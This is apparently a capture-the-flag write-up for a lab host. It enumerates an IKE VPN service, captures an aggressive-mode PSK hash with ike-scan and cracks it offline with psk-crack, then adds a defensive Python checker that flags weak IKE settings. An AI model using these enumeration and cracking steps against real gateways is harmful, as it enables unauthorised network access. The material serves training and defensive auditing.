Information gathering
nmap 10.129.238.52
Nmap scan report for expressway.htb (10.129.238.52)
Host is up (0.30s latency).
Not shown: 999 closed tcp ports (conn-refused)
PORT STATE SERVICE
22/tcp open ssh
Only port 22 is open and nothing further could be learned from it; the OpenSSH version is also a recent one.
sudo nmap -sU 10.129.238.52
Nmap scan report for 10.129.238.52
Host is up (0.13s latency).
Not shown: 992 closed udp ports (port-unreach)
PORT STATE SERVICE
68/udp open|filtered dhcpc
69/udp open|filtered tftp
500/udp open isakmp
4500/udp open|filtered nat-t-ike
20313/udp open|filtered unknown
27015/udp open|filtered halflife
35777/udp open|filtered unknown
55544/udp open|filtered unknown
Port 500/udp is running an ISAKMP (IKE) service.
ike-scan -A 10.129.238.52
10.129.238.52 Aggressive Mode Handshake returned HDR=(CKY-R=acc21ad3257774c3) SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800) KeyExchange(128 bytes) Nonce(32 bytes) ID(Type=ID_USER_FQDN, ike@expressway.htb) VID=09002689dfd6b712 (XAUTH) VID=afcad71368a1f1c96b8696fc77570100 (Dead Peer Detection v1.0) Hash(20 bytes)
The responder reveals its identity, ike@expressway.htb.
Add 10.129.238.52 expressway.htb to /etc/hosts.
ike-scan -P -M -A -n fakeID 10.129.238.52
10.129.238.52 Aggressive Mode Handshake returned HDR=(CKY-R=b2bf75e8f8aaefe5) SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800) KeyExchange(128 bytes) Nonce(32 bytes) ID(Type=ID_USER_FQDN, ike@expressway.htb) VID=09002689dfd6b712 (XAUTH) VID=afcad71368a1f1c96b8696fc77570100 (Dead Peer Detection v1.0) Hash(20 bytes)
IKE PSK parameters (g_xr:g_xi:cky_r:cky_i:sai_b:idir_b:ni_b:nr_b:hash_r): ...
With the PSK hash captured, the companion tool psk-crack can run a dictionary attack against it.
echo '3e793795560327851aff89e01824997613223fc0d107fc328c91f53856e0accfc3d4d358b2a136fe597d70d4a5600c2eb83c5cc57600d19e77ab61fd5fae55833b0c918789f17fa87c54644270caf85868d092d0370087b33926a11be6c860d612e268e395f2389578b3869706cf4561f17a87e723d89dee10995e69e7520858:4cbeb43dbd436199ec9aa35c15324dcf035520141daf86ad4870afd17e5ead150d5fcfef97a477115ce7b9ff7d12bf99ddfaca659bfc21f7cdd3b7ddc54b7c30534c4c98dfbc73b13e5c018e0841adb4c7cbc9ef1fbf74b198ed63e402760bd02b02a3c7063780b7097402a6126029d1c4a08303d901e8d96008b56c4522be63:b2bf75e8f8aaefe5:99026807e4a02ac3:00000001000000010000009801010004030000240101000080010005800200028003000180040002800b0001000c000400007080030000240201000080010005800200018003000180040002800b0001000c000400007080030000240301000080010001800200028003000180040002800b0001000c000400007080000000240401000080010001800200018003000180040002800b0001000c000400007080:03000000696b6540657870726573737761792e687462:20d544a13c6e7b9fc2e141c6aa51b149af2e3d70:141674c019572ee01fb468bda80445a3455ab0544943bcf279c5d1a4e07d2bbd:b9b5e8c2d7e9a56ed1e4bf5490ab0ad8dcd8171c' >
psk-crack -d /usr/share/wordlists/rockyou.txt
Starting psk-crack [ike-scan 1.9.6] Running dictionary cracking mode
key matches SHA1 0ccb90ae7420110544da4040192501fdaa42188a
Ending psk-crack: 8045040 iterations 5.821 seconds (1382017.44 iterations/sec)
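Everything psk-crack needs above follows from the responder's accepted proposal: aggressive mode, PSK auth and a clear-text ID. A defender auditing their own VPN gateway can pull those attributes straight out of an ike-scan handshake line. The parser and checks below are an added example (not part of the writeup or of ike-scan); the sample line, its cookie and the vpn@example.test identity are constructed placeholders shaped like the output above.

```python
import re

# Constructed sample in the shape of the ike-scan -A line shown above;
# the cookie and identity are placeholders, not values from the target.
SAMPLE = (
    "10.0.0.1 Aggressive Mode Handshake returned HDR=(CKY-R=0123456789abcdef) "
    "SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds "
    "LifeDuration=28800) KeyExchange(128 bytes) Nonce(32 bytes) "
    "ID(Type=ID_USER_FQDN, vpn@example.test) VID=09002689dfd6b712 (XAUTH)"
)

SA_RE = re.compile(r"SA=\(([^)]*)\)")
ID_RE = re.compile(r"ID\(Type=(\w+),\s*([^)]+)\)")

# SA attribute values a gateway audit should flag, with the reason.
WEAK = {
    ("Enc", "3DES"): "64-bit block cipher (Sweet32); prefer AES",
    ("Hash", "SHA1"): "SHA1 integrity; prefer the SHA2 family",
    ("Group", "2:modp1024"): "1024-bit MODP DH group; prefer 2048-bit MODP or ECP",
    ("Auth", "PSK"): "PSK auth; with aggressive mode the responder hash is crackable offline",
}


def parse_handshake(line):
    """Split one ike-scan handshake line into mode, SA attributes and peer ID."""
    sa_match = SA_RE.search(line)
    sa = dict(kv.split("=", 1) for kv in sa_match.group(1).split()) if sa_match else {}
    id_match = ID_RE.search(line)
    return {
        "aggressive": "Aggressive Mode Handshake returned" in line,
        "sa": sa,
        "id": (id_match.group(1), id_match.group(2).strip()) if id_match else None,
    }


def audit(line):
    """Return the list of findings for the proposal the responder accepted."""
    info = parse_handshake(line)
    findings = []
    if info["aggressive"]:
        findings.append("IKEv1 aggressive mode accepted: identity and PSK hash exposed to any initiator")
    for (attr, bad), why in WEAK.items():
        if info["sa"].get(attr) == bad:
            findings.append(f"{attr}={bad}: {why}")
    if info["id"] and info["id"][0] == "ID_USER_FQDN":
        findings.append(f"responder identity sent in clear: {info['id'][1]}")
    return findings
```

Run audit() over the lines ike-scan -A prints for each gateway; an empty list means nothing from this checklist was accepted.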